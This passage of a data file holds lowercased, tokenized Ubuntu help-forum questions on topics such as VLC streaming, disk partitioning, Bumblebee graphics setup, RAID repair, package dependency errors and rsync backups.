http-proxy-temp-path=/var/lib/nginx/proxy -- http-scgi-temp-path=/var/lib/nginx/scgi -- http-uwsgi-temp-path=/var/lib/nginx/uwsgi -- lock-path=/var/lock/nginx.lock -- pid-path=/run/nginx.pid -- with-pcre-jit -- with-debug -- with-http_addition_module -- with-http_dav_module -- with-http_geoip_module -- with-http_gzip_static_module -- with-http_image_filter_module -- with-http_realip_module -- with-http_stub_status_module -- with-http_ssl_module -- with-http_sub_module -- with-http_xslt_module -- with-ipv6 -- with-mail -- with-mail_ssl_module -- add-module=/build/buildd/nginx-1.4.1/debian/modules/nginx-auth-pam -- add-module=/build/buildd/nginx-1.4.1/debian/modules/nginx-dav-ext-module -- add-module=/build/buildd/nginx-1.4.1/debian/modules/nginx-echo -- add-module=/build/buildd/nginx-1.4.1/debian/modules/nginx-upstream-fair -- add-module=/build/buildd/nginx-1.4.1/debian/module/ngx_http_substitutions_filter_module can anybody help me understand if i did the build correctly ?
393842	unable to stream video from ubuntu to windows 7	i 'm trying to do some research about streaming method on vlc , so my first choice is udp . i have 2 pc connected on wlan using windows 7 as hotspot , windows 7 ip is 192.168.238.1 with pentium t4500 dual core at 2.3 ghz and 2 gb ram , and ubuntu ip is 192.168.238.101 with intel core i7 cpu @ 2ghz x 8 and 2 gb ram . this is what i do on windows pc : open vlc , click media > stream , add my mp4 video file with 636*360 pixel resolution and the size is 291 mb , and i click stream , and next . on this dialog windows , i choose udp ( legacy ) and click add , then i fill the address box with ubuntu ip , then i click next . the next dialog box i check the activate transcoding check box , and the profile is set to video - h.264 + mp3 ( mp4 ) by default , so i just click next . on the next windows i just click stream , stream all elementary streams check box unchecked . up to this step , vlc on windows pc seek bar is moving just like it is playing the video , but without sound or picture , so i guess everything is normal and vlc is streaming . in ubuntu pc : open vlc , media > open network stream , and i fill the box with udp : // @ :1234 , and click play the video is playing , but it is in poor quality , it jagged every 2-3 seconds , and just hang in there with boxes around the screen , after 10 seconds or so , it play again for 2-3 second and then jagged again . so my first question is : did i do something wrong ? what could be the problem of poor streaming ? is my windows pc is not powerful enough ? thats my first guess so this time i decided to use my ubuntu pc as streaming server . on ubuntu pc , i do exactly the same as what i did on windows pc , except for address i put my windows pc ip , however after step 5 , vlc on ubuntu pc does n't play the video without picture and sound like vlc on windows pc did . then i try to receive the video stream in windows pc , but nothing happened . and my second question is : why ca n't i stream the same video using same method from ubuntu to windows ?
393845	ubuntu gparted does n't detect windows partition	please do n't mark it duplicate . i have been through the rest of the posts and suggestions ! i am trying to dual boot windows 7 with ubuntu or kali linux but i am unable to do so . i have backed up all my data to an external hard drive . so it is safe to work with partitioning . i have a 500 gb hard drive and installed windows 7 onto a 150gb partition created with windows 7 installer partitioning tool . i created kali linux bootable usb but when i proceed to the manual partitioning tool in the installer , it does n't detect the windows partition . it says the 500 gb space is free ( unallocated ) . i booted into the live kali linux form usb and tried gparted . it gives me the following error . /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? i tried the fdisk and its output is given below . root @ kali : ~ # fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xf17f14b8 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 115345407 57569280 6 fat16 /dev/sda3 115345408 430327807 157491200 7 hpfs/ntfs/exfat disk /dev/sdb : 7747 mb , 7747397632 bytes 255 heads , 63 sectors/track , 941 cylinders , total 15131636 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b19d6 device boot start end blocks id system /dev/sdb1 * 63 15131635 7565786+ c w95 fat32 ( lba ) how should i fix this ?
393848	external monitor display on thinkpad w520 with 12.04	i know there is a lot of material regarding these problems , but much of it seems outdated and nothing seems to be working for my situation : thinkpad w520 ( intel 3000 and nvidia 1000m chipset ) os : ubuntu 12.04.3 . bios graphics card setting : optimus bios os optimus auto-detection : disabled i used the bumblebee wiki below to install and setup bumblebee : https : //wiki.ubuntu.com/bumblebee # installation after setting my busid for the graphics card to `` pci:01:00.0 '' ( see config files below ) , i am able to run optirun firefox and the virtualgl tests like optirun glxspheres64 and glxspheres64 . so , i believe all is well with the bumblebee installation , except i can not connect to my external monitor ( via vga ) . any ideas on how to do this ? the w520 has the vga ( and displayport ) hardwired to the nvidia card , as described by zachary sunberg : http : //zachstechnotes.blogspot.com/2012/04/post-title.html so , i believe this makes things a bit tricky when trying to connect the vga to an external monitor . i believe that i have to use a server/screen clone , described in my attempts documented below : i tried the following post to configure the external monitors , http : //hillspcworld.com/forum/index.php ? topic=2.0 but rebooting after step 7 , causes the os to completely crash ( black screen after the bootloader that says `` could not write bytes : broken pipe '' ) . i believe this is due to the xorg server disrupting my system somehow . i tried a similar approach in the following tutorial , but i had the same crash as in ( 1 ) during the reboot after installing xorg-dev : http : //sagark.org/optimal-ubuntu-graphics-setup-for-thinkpads/ as of now , i am wondering where to go from here . i have a couple leads below , any ideas on what the problem is , or what i can do ? is there a better suggestion ? http : //zachstechnotes.blogspot.com/2012/04/post-title.html https : //github.com/bumblebee-project/bumblebee/issues/77 https : //github.com/bumblebee-project/bumblebee/issues/522 also , here are some of my files ( let me know if there is a better configuration - the only change i made was uncommenting the `` busid pci:01:00.0 '' in the xorg.conf.nvidia file : lucas @ lucas-thinkpad-w520 : ~ $ more /etc/bumblebee/xorg.conf.nvidia section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' # if the x server does not automatically detect your vga device , # you can manually set it here . # to get the busid prop , run `lspci | egrep 'vga|3d'` and input the data # as you see in the commented example . # this setting may be needed in some platforms with more than one # nvidia card , which may confuse the proprietary driver ( e.g. , # trying to take ownership of the wrong device ) . also needed on ubuntu 13.04 . busid `` pci:01:00:0 '' # setting probeallgpus to false prevents the new proprietary driver # instance spawned to try to control the integrated graphics card , # which is already being managed outside bumblebee . # this option does n't hurt and it is required on platforms running # more than one nvidia graphics card with the proprietary driver . # ( e.g . macbook pro pre-2010 with nvidia 9400m + 9600m gt ) . # if this option is not set , the new xorg may blacken the screen and # render it unusable ( unless you have some way to run killall xorg ) . option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' nouveau driver : lucas @ lucas-thinkpad-w520 : ~ $ more /etc/bumblebee/xorg.conf.nouveau section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nouveau '' # if the x server does not automatically detect your vga device , # you can manually set it here . # to get the busid prop , run `lspci | egrep 'vga|3d'` and input the data # as you see in the commented example . # this setting is needed on ubuntu 13.04 . # busid `` pci:01:00:0 '' bumblebee configuration : lucas @ lucas-thinkpad-w520 : ~ $ more /etc/bumblebee/bumblebee.conf # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver= # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primu s # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-current pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau thank you .
393851	how to customize system sounds	yesterday i 've found a web page containing all the iconic sounds/noises from all the star trek series/films . being the nerd that i am , i thought it would be fun to change some of the system sounds into star trek sounds . like when i get an error message the sound `` tng red alert 1 '' plays , or when transferring a file it plays `` tng transporter 4 '' . while i am a big star trek nerd , i 'm still quite new to linux/ubuntu . so my question is if anyone knows how to to this or knows a tool that might help . im using ubuntu 13.10 with default unity . thank you in advance , ahead warp factor one !
393852	installing ubuntu server to virtual box produces error	i get the following error when ii try to install ubuntu server to virtual box failed to open the optical disk file c : \users\joshua oche idoko\desktop\ubuntu-12.04.3-server-amd64.iso . could not get the storage format of the medium 'c : \users\joshua oche idoko\desktop\ubuntu-12.04.3-server-amd64.iso ' ( verr_not_supported ) . result code : vbox_e_iprt_error ( 0x80bb0005 ) component : medium interface : imedium { 05f2bbb6-a3a6-4fb9-9b49-6d0dda7142ac } callee : ivirtualbox { fafa4e17-1ee2-4905-a10e-fe7c18bf5554 } callee rc : vbox_e_object_not_found ( 0x80bb0001 ) can someone help me rectify the problem
393853	why there 's no tcp_westwood ?	i am on ubuntu server 12.04 $ sudo cat /etc/issue /etc/lsb-release ubuntu 12.04.1 lts \n \l distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.1 lts '' $ uname -a linux vps2 2.6.32-042stab078.28 # 1 smp mon jul 8 10:17:22 msk 2013 x86_64 x86_64 x86_64 gnu/linux according to this http : //manpages.ubuntu.com/manpages/precise/man7/tcp.7.html there should be tcp_westwood , but i ca n't find on my server : $ sudo echo 1 > /proc/sys/net/ipv4/tcp_westwood -bash : /proc/sys/net/ipv4/tcp_westwood : no such file or directory $ sudo tail /proc/sys/net/ipv4/*congest* == > /proc/sys/net/ipv4/tcp_allowed_congestion_control < == cubic reno == > /proc/sys/net/ipv4/tcp_available_congestion_control < == cubic reno == > /proc/sys/net/ipv4/tcp_congestion_control < == cubic so how could i enable tcp westwood for 12.04 lts ?
393854	ssh keys do n't work on kde	i 've got my ssh keys working on gnome and xfce ( using gnome-keyring ) . however when i switched to kde , then it does n't work at all . what 's more , even when i start ssh-agent , and add keys , and try to connect to a server , then it looks like my keys are being checked , but are not used , and as a result i 'm being asked for a password . how can i simply use ssh keys on kde ?
393855	unmet dependencies error	i have been having some trouble with installing things on my linux setup . i am running ubuntu 13.04 . i get the error 'error : brokencount > 0 ' . i tried to run sudo apt-get -f install to see if that would fix it , but it does'nt work . i also tried sudo apt-get autoremove , but i only get you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : python-wxgtk2.8 : depends : libwxgtk-media2.8-0 ( > = 2.8.12.1 ) but it is not installed e : unmet dependencies . try using -f. but as i say , this does nothing . help !
393857	how to fix degraded software raid ?	how can i fix this degraded raid ? someone can help me to figure out ? ... but i am not sure i am adding the correct drive / partition . possible for someone to confirm the command i need to use for this ? thank you , [ root @ host ~ ] # mdadm -- detail /dev/md* mdadm : /dev/md does not appear to be an md device /dev/md2 : version : 0.90 creation time : sun nov 3 01:42:24 2013 raid level : raid1 array size : 307198912 ( 292.97 gib 314.57 gb ) used dev size : 307198912 ( 292.97 gib 314.57 gb ) raid devices : 2 total devices : 1 preferred minor : 2 persistence : superblock is persistent update time : wed dec 18 12:31:45 2013 state : clean , degraded active devices : 1 working devices : 1 failed devices : 0 spare devices : 0 uuid : 92707d2b : a91ff102 : a4d2adc2:26fd5302 events : 0.601403 number major minor raiddevice state 0 8 2 0 active sync /dev/sda2 1 0 0 1 removed /dev/md4 : version : 0.90 creation time : sun nov 3 01:42:30 2013 raid level : raid1 array size : 1629926336 ( 1554.42 gib 1669.04 gb ) used dev size : 1629926336 ( 1554.42 gib 1669.04 gb ) raid devices : 2 total devices : 1 preferred minor : 4 persistence : superblock is persistent update time : wed dec 18 12:31:52 2013 state : active , degraded active devices : 1 working devices : 1 failed devices : 0 spare devices : 0 uuid : 731d0588 : afdc5dc4 : a4d2add2:26fb5352 events : 0.3394981 number major minor raiddevice state 0 8 4 0 active sync /dev/sda4 1 0 0 1 removed [ root @ host ~ ] # cat /proc/mdstat personalities : [ raid1 ] md4 : active raid1 sda4 [ 0 ] 1629926336 blocks [ 2/1 ] [ u_ ] md2 : active raid1 sda2 [ 0 ] 307198912 blocks [ 2/1 ] [ u_ ] unused devices : < none >
393858	problem adding shell to new user	after adding a new user . it 's shell is not added to /bin/bash itstead it is added to /bin/sh i have to change the shell for every new user i add . if there is any way a new user added should be given shell /bin/bash
393859	xubuntu 12.04 starts slower than ubuntu 12.04	i moved from ubuntu 12.04 to xubuntu 12.04 . but the boot time duration are longer comparison to ubuntu . instead of standard booting window i see dark screen with prompts hz ? that flows at screen . here is output after dmesg can somebody give some hint how to figure out this question ?
393861	samba wants me to log onto workgroup instead of shared drive	i can see ( browse ) the shared drives on my unbuntu box from anything else ( windows , raspberry pi , etc . ) , which all see all of the shares regardless of their source . however from the ubuntu box , i ca n't browse anything . in dolphin ( for example ) - when i click network , then double-click `` samba shares '' in that window , rather than seeing a tree with the machines and their drives that are workgroup members , i 'm presented with a dialog box inviting me to login to the workgroup . the path shown in the address bar , is `` smb : //mygroup/ '' or `` smb : //bill @ mygroup/ '' . it never finds any actual resources . why is it different than the other machines ( windows xp pro , and linux ) that let me browse the network , and might ( or if visited previously and cached , present me with a login dialog to enter my username and pwd . what 's the meaning of logging into a workgroup- and is that really possible ? how to i get my new ubuntu box to allow me to browse the drives that are shared elsewhere ? i 've copied the global section of the samba.conf file from the linux box , hoping that it would result in the same behavior on the ubuntu box as i get from my existing fedora box when i attempt to browse the shares . where have i gone wrong ? the share mode , etc . are the same on those . thanks , bill
393864	sony walkman 3 in 1 and ubuntu	i 'm considering buying sony walkman 3 in 1 ( headphones with included mp3 player in them ) , to be exact the name of model i want to buy is sony nwz-wh303 . i 'm currently running ubuntu 10.04 and i do n't want to buy device which wo n't work on it . i googled it , but it seems no gnu/linux user wrote about it yet . i 'd wish it to work simply as a pendrive - plug & play , simply copy the mp3s to the device via usb . anyone knows , if it will work like this ? or will i need some fancy apps to transfer the music ?
393866	held broken packages - ubuntu 13.10	i installed ubuntu 13.10 from pen drive . i have radeon graphics on board but not in use currently and i am trying to install amd catalyst for ubuntu with the help of documentation provided at http : //wiki.cchtml.com/index.php/ubuntu_quantal_installation_guide but i am getting error when i enter command sudo apt-get install xbmc . when i run dpkg -- get-selections | grep hold it does not show anything . kevin @ kevin-lenovo-g570 : ~ $ sudo apt-get install xbmc reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : xbmc : depends : ttf-liberation but it is not installable recommends : libvdpau1 but it is not going to be installed recommends : libva-intel-vaapi-driver e : unable to correct problems , you have held broken packages . update : while trying to add repositories sudo apt-add-repository ppa : wsnipex/xbmc-xvba i get following error kevin @ kevin-lenovo-g570 : ~ $ sudo apt-add-repository ppa : wsnipex/xbmc-xvba [ sudo ] password for kevin : warning : xvba is deprecated as of october 2013 , this ppa is not updated anymore ! you should switch to the oss radeon driver with vpdau support xbmc pvr builds with direct amd/ati x-video bitstream acceleration ( xvba ) support for xvba use fglrx binary driver ( amd catalyst ) > = 11.11 install howto ( step 2 required ) : http : //forum.xbmc.org/showthread.php ? t=116996 more info : https : //launchpad.net/~wsnipex/+archive/xbmc-xvba press [ enter ] to continue or ctrl-c to cancel adding it
393868	when 2 or more ubuntu laptops connect to home wireless network only one gets the connection	i have 2 laptops running ubuntu 12.04 at home . when only one is using the wireless everything is fine but when we need to have the 2 of them using the wireless then the problem happens . it 's like the first one to get the connection kindof of sucks it and the other one can not connect or sometimes can but for very short times and it works very slow . i tried searching this forum for answers but did not find any specific enough . i have friends with the same problem and also in my sisters flat the same problem happens . thanks in advance .
393869	install ubuntu on windows 8 hdd / ssd system	i have recently bought a laptop with an ssd of 128 gb and a hdd of 1 tb . currently i am running windows 8 . windows is installed on the 128 gb ssd ( c drive ) and i use the 1 tb drive for data storage ( movies , pictures , musis , documents ... ) . this is the d drive . would it be possible for me to install ubuntu on the c drive and keep using d as my data drive ? i do n't have enough space to make a backup of my files . what are my options to install ubuntu without losing the files on the d drive ? thanks in advance .
393871	sound not coming from speakers on 13.04	i have installed ubuntu 13.04 and my system configuration is intel z77sl-50 \k chipset with intel high definition audio lspci -v list following as audio device 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : intel corporation device 2030 flags : bus master , fast devsel , latency 0 , irq 45 memory at f7c30000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel aplay -l list is following : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 3 : id 2806 digital [ id 2806 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 following cards are listed : cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf7c30000 irq 45 1 [ u0x46d0x825 ] : usb-audio - usb device 0x46d:0x825 usb device 0x46d:0x825 at usb-0000:00:1d.0-1.7 , high speed now when i insert speakers or use 3.5 jack ear phones i can not get any sound but if i insert usb earphones i am able to listen to the sound . why can not i listen sound from analog speakers over 3.5jack ? about pavucontrol : list output devices as hdmi/display port built in audio . configuration tab in pavucontrol only shows digital stereo ( hdmi ) output one more thing monitor connected to cpu over hdmi .
393873	lubuntu usb installer not working , get error [ ? ? ? ? ? ? ]	so i have installed lubuntu on two of my laptops and they did wonders for them , so i decided to dig out my old laptop from '05 and breathe life back into it . when i tried to install lubuntu onto it through a liveusb though ( same one i installed on both of my previous two ) , i get an error i do n't know how to search up . the installer 's desktop mode on the laptop works fine , but when i try to run the actual installer , it goes through everything then after i choose to install with updates , i get an error prompt that just says `` ? ? ? ? ? ? '' . when i try to close the error window or press `` ok '' , it just pops back up , and i ca n't shut off the installer , has anyone ever encountered this before ? hardware info : 00:00.0 host bridge : intel corporation mobile 915gm/pm/gms/910gml express processor to dram controller ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 915gm/gms/910gml express graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 915gm/gms/910gml express graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 2 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 4 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb2 ehci controller ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev d3 ) 00:1f.0 isa bridge : intel corporation 82801fbm ( ich6m ) lpc interface bridge ( rev 03 ) 00:1f.2 ide interface : intel corporation 82801fbm ( ich6m ) sata controller ( rev 03 ) 02:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 02:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 02:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 02:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 02:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) 02:03.0 network controller : intel corporation pro/wireless 2915abg [ calexico2 ] network connection ( rev 05 )
393874	make redis start by demand ( not autostart )	i used this tutorial to set redis http : //redis.io/topics/quickstart it turned out to start automatically when the system boots . i 'd like it not to do that and start by demand . how do i do that ?
393875	no menu in dogecoin-qt wallet client	as you can see , there is no menu on the top menu bar . it says `` dogecoin - wallet '' but there are no `` file '' , `` settings '' , or `` help '' menu titles . clicking on the word `` dogecoin '' in the menu bar or on the top horizontal panel in unity has no effect . according to this http : //computriks.com/en/bitcoin-encrypt-wallet it seems there should be a menu , albeit that 's for a different type of currency . see also : http : //bitcoin.stackexchange.com/questions/10482/no-menu-in-unbuntu-bitcoin-qt code comes from : https : //github.com/dogecoin/dogecoin which is a fork , i believe , of the bitcoin client . i 've tried restarting , but do n't see what f2 has to do with it : thufir @ dur : ~ $ thufir @ dur : ~ $ display=:0.0 unity -- replace the program 'unity ' is currently not installed . you can install it by typing : sudo apt-get install unity thufir @ dur : ~ $
393876	how to choose between hdmi and displayport sound output using radeon free drivers	my graphics card is a vga compatible controller : advanced micro devices , inc. [ amd/ati ] turks xt [ radeon hd 6670/7670 ] i 'm using open source drivers and have 3 screens plugged in , using dvi , hdmi and displayport . i 'd like to have to sound redirected to the displayport-connected monitor instead of the hdmi-connected one . in sound settings , i can choose between 1.digital output ( s/pdif ) ( my motherboard 's i guess ) , or 2.hdmi / displayport - turks/whistler hdmi audio [ radeon hd 6000 series ] , but despite the name , it uses hdmi output and not displayport output . where do i set that ?
393877	using rsync within the terminal	i am relatively new to linux ( ubuntu 12.04 ) . i am researching on how to use rsync to backup a certain folder from my local ( ubuntu ) computer to my windows xp networked ( shared ) computer . what i want and intend to do is use the command to copy only the files that have changed since my last rsync backup to the xp computer . i know there 's probably software out there that can do this but i do n't like adding things ( software ) to my computer unless i absolutely have to . my home network set-up is shared using samba . my home network is shared within 'workgroup ' settings , i have certain folders that are shared on my xp computer for this reason . i figured out how to use the rsync to only copy files ( on the same computer ) to another folder on the same hdd . this is what i tried within terminal , rsync -av /home/danny/temp /home/danny/temp2 but i want to be able to have the destination ( networked ) folder my xp computer . any help would be appreciated cheers .
393879	booting from usb always in nomodeset ?	i am booting ubuntu 12.04 from a usb made with linux live usb creator . it is fine as long as i select the nomodeset option at the purple ubuntu screen . the question is : how can i set this mode to be the default one so i do n't have to do it every time ? if i add the option to /etc/default/grub it does n't do anything and if i sudo update-grub i get this error '' /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . '' how to fix this ?
393880	why install app in launcher ?	what is the advantage to install app on the pc to have the link in the launcher ? i mean , the first time i use gmail ubuntu suggests me to install the app in the lateral bar , but when i click it seems it only open a new web page . there are other real advantage that i do not know ? it seems like a simple bookmark ...
393882	png terminal in gnuplot	i have : - ubuntu 13.10 64 bit - wxmaxima 13.04.2 ( maximy:5.31.3 ) - lisp : sbcl 1.1.1.0.debian - gnuplot version 4.6 patchlevel 4 last modified 2013-10-06 when i check terminals in gnuplot using : set terminal then i do not see png terminal . what should i do to change it ? tia adam
393887	how to start ubuntu without executing rc.local	i added my script to /etc/rc.local file and now ubuntu hangs . ctr+alt+f1 does not work . i only see black screen with one blinking charcter - . how to resolve it ? maby there is some emergency booting and i could boot system without executing rc.local file ?
393889	troubles booting ubuntu 13.04 on mac osx from usb	i created a bootable usb drive the other day with the full version of ubuntu 13.04 , not just the live cd . i tried it out on my hp pc with windows 8 by booting from the bios , but yesterday i tried it out with a 2009 macbook . when i boot and hold option to get to the boot menu , it only shows macintosh hd , not my usb drive . how can i boot my ubuntu usb drive on a mac ?
393892	usb dongle ( wireless modem ) goes missing after a while	i 'm using a huawei e173 usb device to get internet access . it works fine from the time i boot up my system . but ( perhaps ) due to a weak signal the connection is lost and sometimes i see the device in the network manager applet but sometimes i do n't . i.e. , once it disconnects , i can not seem to find it in the applet to reconnect . so i must reboot and it 's back . is there some way i can find it if it vanishes ? for now , i 've tried restarting network services like this : sudo /etc/init.d/networking restart but it has no effect . please advise .
393895	nvidia drivers failing after updating with update manager	i 'm currently using ubuntu 12.04 64-bit . after installing all available updates for my system , and a reboot , the following error message shows up : starting load fallback graphics devices [ fail ] i could n't run any commands , and the system did n't respond to ctrl + alt + del . but if i pressed the power button on my computer the system responded and shutdown the system successfully . after powering up again , the only sign of life was a blinking underscore . lucky me , i had a backup that i restored . i understand that it 's probably the nvidia drivers that 's `` broken '' . so , after restoring my backup , i 'm willing to make a successful system update , and preferably without needing to restore my backup . about a year ago or so when i installed ubuntu on my computer , the additional drivers windows looked like this : i installed the recommended version . now , a year later , my additional drivers windows look like this : the bottom two is identical , while the top two are two different versions , 304.108 and 304.88 . here 's the description of the four different drivers : http : //pastebin.com/j2rd1md4 the latest driver according to the description ( s ) is number 2 . what should i do ? or more like , what would you do ? should i install all updated except the nvidida ones , or should i try to install the latest one from the additional drivers , or what ? the ultimate would be to have the latest nvidida drivers installed , together with a fully updated system . the following nvidia related updates is available in the update manager , and one/some of them is probably the reason why the graphics is malfunctioning . thanks in advance !
393898	wireless works , wired ethernet fails on 12.04 ( hardware ok )	i need some help with wired internet connection in ubuntu 12.04 . wireless network works fine on mine laptop . on desktop i have wired internet which have worked when i had windows 7 on it . because the computer is a little bit old and too slow for windows 7 i installed ubuntu 12.04 as primary os and deleted windows . before this installation network worked fine , but now it does n't . when i open browser it does n't even open homepage and when i search from search bar it finds results , but when i try to open certain page ( etc . youtube , bbc ... ) it does n't open it , it 's just loading . i typed ifconfig in terminal and it says : link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors0 dropped0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
393900	how to install opencv in ubuntu 12.04 and run it with python ?	i would like to do image processing on raspberry-pi . for that , first i want to do it in ubuntu . when i run the command sudo apt-get install libopencv-dev . i got the following output : naveen @ ubuntu : ~ $ sudo apt-get install libopencv-dev [ sudo ] password for naveen : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gir1.2-ubuntuoneui-3.0 firefox-locale-en language-pack-kde-en cabextract kde-l10n-engb libjpeg62 libubuntuoneui-3.0-1 thunderbird-globalmenu language-pack-en-base language-pack-kde-en-base language-pack-en use 'apt-get autoremove ' to remove them . the following extra packages will be installed : debhelper dh-apparmor gettext html2text intltool-debian libatk1.0-dev libavcodec-dev libavformat-dev libavutil-dev libcairo-script-interpreter2 libcairo2-dev libdc1394-22-dev libexpat1-dev libfontconfig1-dev libfreetype6-dev libgdk-pixbuf2.0-dev libgettextpo0 libglib2.0-dev libgtk2.0-dev libice-dev libilmbase-dev libmail-sendmail-perl libopencv-calib3d-dev libopencv-calib3d2.3 libopencv-contrib-dev libopencv-contrib2.3 libopencv-core-dev libopencv-core2.3 libopencv-features2d-dev libopencv-features2d2.3 libopencv-flann-dev libopencv-flann2.3 libopencv-gpu-dev libopencv-gpu2.3 libopencv-highgui-dev libopencv-highgui2.3 libopencv-imgproc-dev libopencv-imgproc2.3 libopencv-legacy-dev libopencv-legacy2.3 libopencv-ml-dev libopencv-ml2.3 libopencv-objdetect-dev libopencv-objdetect2.3 libopencv-video-dev libopencv-video2.3 libopenexr-dev libpango1.0-dev libpcre3-dev libpcrecpp0 libpixman-1-dev libpng12-dev libpthread-stubs0 libpthread-stubs0-dev libraw1394-dev libsm-dev libswscale-dev libsys-hostname-long-perl libunistring0 libx11-dev libx11-doc libxau-dev libxcb-render0-dev libxcb-shm0-dev libxcb1-dev libxcomposite-dev libxcursor-dev libxdamage-dev libxdmcp-dev libxext-dev libxfixes-dev libxft-dev libxi-dev libxinerama-dev libxrandr-dev libxrender-dev po-debconf x11proto-composite-dev x11proto-core-dev x11proto-damage-dev x11proto-fixes-dev x11proto-input-dev x11proto-kb-dev x11proto-randr-dev x11proto-render-dev x11proto-xext-dev x11proto-xinerama-dev xorg-sgml-doctools xtrans-dev suggested packages : dh-make gettext-doc libfaad-dev libgsm1-dev libogg-dev libschroedinger-dev 